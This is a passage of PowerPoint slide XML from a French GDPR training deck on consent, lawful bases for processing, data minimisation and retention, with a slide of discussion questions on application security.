                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNIVOQUE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Être donné sans ambiguïté par un acte positif </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LIBRE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ne doit être ni contraint ni influencé, un choix réel doit être offert à la personne</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="67046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fade">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="10" end="1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fade">
                                      <p:cBhvr>
                                        <p:cTn id="3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700635" y="922096"/>
            <a:ext cx="10691265" cy="864072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – La Licéité du traitement – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La nécessité contractuelle</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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800100" y="2011680"/>
            <a:ext cx="10118912" cy="4709795"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Exécution d’un contrat auquel par la personne concernée est partie prenante</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Exécution de mesures précontractuelles prises à la demande de la personne concernée</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="373054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700635" y="922096"/>
            <a:ext cx="10691265" cy="864072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – La Licéité du traitement – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Obligation Légale</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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800100" y="1786168"/>
            <a:ext cx="10118912" cy="4935307"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RESPECT D’OBLIGATION IMPOSÉE AU RT PAR LA LÉGISLATION OU LA RÉGLEMENTATION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Obligation de transmission d’information aux autorités publiques pour les institutions financières</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Obligation de l’employeur de mettre en œuvre des traitements pour la gestion fiscale et sociale</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="197871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700635" y="922096"/>
            <a:ext cx="10691265" cy="864072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – La Licéité du traitement – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Sauvegarde </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>des intérêts vitaux</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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800100" y="1786168"/>
            <a:ext cx="10270236" cy="4935307"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UTILISÉ UNIQUEMENT LORSQU’IL EST IMPOSSIBLE DE RECOURIR À UN AUTRE FONDEMENT</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Menace de la vie de la personne</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Incapacité physique d’exprimé le consentement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Gestion de certaines problématiques humanitaires (Catastrophes, épidémies, rapatriements, etc.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27899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700635" y="922096"/>
            <a:ext cx="10691265" cy="864072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – La Licéité du traitement – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>L’intérêt public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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800100" y="1786168"/>
            <a:ext cx="10270236" cy="4935307"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EXÉCUTION D’UNE MISSION D’INTÉRÊT PUBLIC OU RELEVANT DE L’EXERCICE DE L’AUTORITÉ PUBLIQUE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Limitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le Responsable de Traitement doit être compétent sur la mission d’intérêt publique qui relève de la finalité poursuivie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Gestion des inscriptions scolaires</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Délivrances de subventions par le Conseil Départementale à des associations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="280901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700635" y="922096"/>
            <a:ext cx="10691265" cy="864072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – La Licéité du traitement – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Intérêts légitimes</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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800100" y="1786168"/>
            <a:ext cx="10852322" cy="4935307"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MISE EN BALANCE DES INTÉRÊTS POUR LE RT ET LES DROITS DE LA PERSONNE CONCERNÉE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La personne peut-elle raisonnablement s’attendre à ce que des données à caractère personnel soient objet d’un traitement pour cette finalité ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Utilisation de vidéosurveillance aux fins de protéger les biens et personnes au sein d’un établissement </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Communication d’une association à ses membres sur son actualité</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="365001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376B8-4091-3BE7-5E43-2CC40D00B54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4D57F37-E1B8-13E7-AB77-C535D8395D9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Généralités – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Pistes de réflexion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1448204B-5DB9-77B9-3E92-C0E47734E117}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700635" y="2293126"/>
            <a:ext cx="10890731" cy="3636088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Pourquoi y a-t-il souvent des failles de sécurité dans les applications ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Quelles sont les informations sensibles pour une entreprises ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Que connaissez-vous comme bonne pratique de sécurité ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Un exemple de système 100% inviolable ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80EE92EB-3F87-2B33-9E14-356382EF2022}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400135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700635" y="922096"/>
            <a:ext cx="10691265" cy="864072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Bonnes pratiques</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="73" name="Straight Connector 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EF1A8C6-8F60-4EF2-B4D7-A5A5E94F69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1267968" y="1786168"/>
            <a:ext cx="9651044" cy="4356611"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Une donnée est pertinente si elle a un lien direct avec la finalité du traitement.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Des données inexactes peuvent porter préjudice aux personnes concernées.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Vérifier la nature, la quantité et la précision des données collectées</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Existe-t-il une autre solution moins intrusive pour la personne ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>JAMAIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> collecter à titre préventif ! ! !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Anonymiser les données dès la conservation, garder l’identification n’est  pas nécessaire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Limiter les zones de commentaires libres et privilégier les choix multiples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="75" name="Straight Connector 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD9760AA-CA3F-4C65-B688-B44307731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50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="391297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700635" y="922096"/>
            <a:ext cx="10691265" cy="864072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Conservation des données</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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800100" y="1786168"/>
            <a:ext cx="10118912" cy="4935307"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
